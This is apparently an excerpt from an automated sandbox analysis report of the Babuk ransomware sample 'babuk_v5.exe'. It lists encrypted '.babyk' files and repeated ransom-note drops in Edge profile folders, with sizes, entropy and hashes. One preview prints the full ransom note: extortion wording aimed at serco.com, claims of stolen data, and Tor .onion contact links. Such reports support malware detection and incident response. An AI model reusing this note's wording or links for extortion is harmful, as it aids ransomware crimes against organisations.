                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999610952779036
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00001.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999629034674376
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00002.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999629601140373
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbtmp.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):524456
                                                                            Entropy (8bit):7.999673638468469
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976063680337458
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.999810926304408
                                                                            Encrypted:true
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):16552
                                                                            Entropy (8bit):7.987633907187054
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\Data\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\Data\nouser1\120712-0049\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\Data\nouser1\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Indexed\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DownloadHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Favorites\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\RACShare\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{0FB43FFB-4315-4B8D-896D-6369AF6B8B73}.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3752
                                                                            Entropy (8bit):7.948815967170085
                                                                            Encrypted:false
                                                                            SSDEEP:96:4aghJrcyIfi83684/F78ROxMSpiGrtjBlCcBovpiyEbhVs8cf:MJoyIp/4/F78wCJGrtD4v4ym8
                                                                            MD5:C03A0C0B8094DBCE51B990D867B90835
                                                                            SHA1:95AC5E38683A90344470C9F65709DD963C531D18
                                                                            SHA-256:B9B29CB3A79C74D0D4EC87CADACDB4C84874E65D83842BAF94F85830E30B419E
                                                                            SHA-512:F0D1AAF6587BDEF50BF3C94850010682A771A337E038F357AAF6963546A44F6132476DBF073844C8E61AA66C4B54A726A9546187C56E3CCED1B6BA014F6FA4B3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.491720845718369
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlwFK6jO1yoa0DnmWN1D5Tc6MfZhAY3D3Z5d+9o2SUVLt5+UxNvEEn:gKQO1yoa0ThNQN3A0Z5et5+0vtn
                                                                            MD5:91B361CD0D32B51DBAB6CD9912585FA5
                                                                            SHA1:E03729B25C573E3DA5E6EC4AE5D389A0AE7E58DB
                                                                            SHA-256:98A1E02541F86FDA3E1A749E6C1C8D210948C89A007BF9B6424D4B41936CC058
                                                                            SHA-512:3913C0B83B9B60CC67A171B9583788435FB08B1E87829FFDD0EE896B29FE348C68260B7325150D279FCC11E1C85ED3EACFC9FCC1098BB83593D13F79D3D8AA08
                                                                            Malicious:false
                                                                            Preview: ....ZW...eP]t.#.o.......kC.............Qf.P.N...4aO\....h......I......\u....&.....f...n..\.(...m.Xo.=.h......q.~'...n.......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976664756514274
                                                                            Encrypted:false
                                                                            SSDEEP:192:fwHt7XmU9vhF5b4XVQ0xZaXg01ulG+Y6nZ:fWftz18OXv1R6nZ
                                                                            MD5:E16A166099424054EAE775CA1B0BA7C4
                                                                            SHA1:F3E3682FA284E24BEDBAEF4988CEFA811F4981DD
                                                                            SHA-256:E2855CB432FF10731F1B05131821B80FECACB58D0F0B03CB12B32BF48471A0FF
                                                                            SHA-512:0880C6080B928EC4C6B7B3EDF0E2546B925BD2B5B190A8A3D7DA939EC53E44152E1CB62D794126036B57BE7BCFAE565E753374B3A49BD5CDA69FE77DE0DE2669
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.5345974440390275
                                                                            Encrypted:false
